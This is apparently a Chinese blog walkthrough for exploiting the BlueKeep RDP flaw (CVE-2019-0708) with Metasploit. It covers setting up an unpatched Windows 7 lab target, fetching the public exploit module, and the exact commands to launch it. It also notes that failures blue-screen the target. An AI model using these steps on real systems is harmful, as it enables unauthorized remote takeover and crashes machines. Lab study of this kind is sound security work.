CVE-2019-0708 远程代码执行漏洞 metasploit 利用

漏洞环境:

需要windows系统,未安装0708补丁,开启3389端口。

Windows7 SP1下载链接,可通过百度网盘或迅雷新建下载任务进行下载:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

安装靶机的时候,需注意选择Windows版本:Windows Ultimate, 默认HOME版本无法成功。

开启3389端口:控制面板-系统和安全-系统-远程设置-远程桌面,选择允许运行。

metasploit工具:

1 . 启动工具:msfconsole
2. 更新工具:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && ./msfinstall
或直接用命令:msfupdate
更新后重新加载下:reload_all
3. 搜索0708套件:search 0708,搜索发现存在cve_2019_0708_bluekeep套件。
4. 加载利用套件:
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

5.将cve_2019_0708_bluekeep_rce.rb copy至/exploits/rdp/目录下
如果这里没有rdp目录,就用mkdir命令创建一个rdp目录后再copy:
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/

6.use exploit/rdp/cve_2019_0708_bluekeep_rce //若只检测,用cve_2019_0708_bluekeep套件。
set rhosts IP
set rport 3389
set target 3
run //开始攻击利用
7. 会话创建成功的情况,
CVE-2019-0708 远程代码执行漏洞 metasploit 利用_第1张图片
会话建立不成功windows系统会出现蓝屏,多试几次会话就会建立成功。

参考:https://www.cnblogs.com/-chenxs/p/11491900.html

你可能感兴趣的:(漏洞利用)